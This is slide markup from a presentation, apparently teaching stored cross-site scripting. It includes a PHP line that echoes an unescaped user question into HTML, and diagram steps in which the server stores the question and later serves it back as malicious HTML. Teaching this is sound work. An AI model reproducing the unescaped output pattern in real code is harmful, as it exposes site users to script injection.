      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2834199"/>
            <a:ext cx="2479040" cy="1144692"/>
            <a:chOff x="0" y="2125649"/>
            <a:chExt cx="1859280" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2131834"/>
              <a:ext cx="683015" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="660175" y="2136076"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 27"/>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8" name="object 28"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="621791" y="2253995"/>
              <a:ext cx="1237487" cy="729983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>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30" name="object 30"/>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31" name="object 31"/>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2" name="object 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="849376" y="3076432"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="637031" y="2307323"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1377695" y="2307323"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>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5" name="object 35"/>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6" name="object 36"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1584950" y="2438385"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="637031" y="2534391"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>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39" name="object 39"/>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40" name="object 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="992725" y="3141071"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="744543" y="2355803"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="object 41"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1379219" y="2369807"/>
              <a:ext cx="460235" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="object 42"/>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3" name="object 43"/>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4" name="object 44"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="744543" y="2355803"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273726" y="3603749"/>
            <a:ext cx="1134533"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6" name="object 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="837183" y="3387337"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="627887" y="2540502"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="627887" y="2540502"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673114" y="2563418"/>
              <a:ext cx="277416" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 49"/>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50" name="object 50"/>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51" name="object 51"/>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52" name="object 52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367764" y="3050012"/>
            <a:ext cx="291253" cy="209973"/>
            <a:chOff x="275823" y="2287509"/>
            <a:chExt cx="218440" cy="157480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="object 53"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="object 54"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="object 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63555" y="3662876"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56" name="object 56"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="390145" y="1456944"/>
            <a:ext cx="8785012" cy="1046480"/>
            <a:chOff x="292608" y="1092708"/>
            <a:chExt cx="6588759" cy="784860"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="object 57"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="292608" y="1092708"/>
              <a:ext cx="6588250" cy="784847"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="58" name="object 58"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId18" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="337794" y="1118958"/>
              <a:ext cx="6493515" cy="688949"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="object 59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="1653134"/>
            <a:ext cx="1227667" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CODE:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2060449" y="1653134"/>
            <a:ext cx="6140873" cy="230293"/>
            <a:chOff x="1545336" y="1239850"/>
            <a:chExt cx="4605655" cy="172720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="object 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1545336" y="1239850"/>
              <a:ext cx="182880" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="182880" h="172719">
                  <a:moveTo>
                    <a:pt x="182880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182880" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182880" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1728216" y="1239850"/>
              <a:ext cx="4238625" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4238625" h="172719">
                  <a:moveTo>
                    <a:pt x="4238244" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4238244" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FEFCF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="object 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5966459" y="1239850"/>
              <a:ext cx="184785" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="184785" h="172719">
                  <a:moveTo>
                    <a:pt x="184403" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450393" y="1491945"/>
            <a:ext cx="8658860" cy="373606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="4A7EBB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="126153" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1609473">
              <a:spcBef>
                <a:spcPts val="993"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>class=’question'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="object 66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864186" y="5154505"/>
            <a:ext cx="2795693" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="object 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740987" y="5752199"/>
            <a:ext cx="1949027" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="539313"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="object 68"/>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69" name="object 69"/>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65" name="object 65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833120" y="2053454"/>
            <a:ext cx="7860453" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1647"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
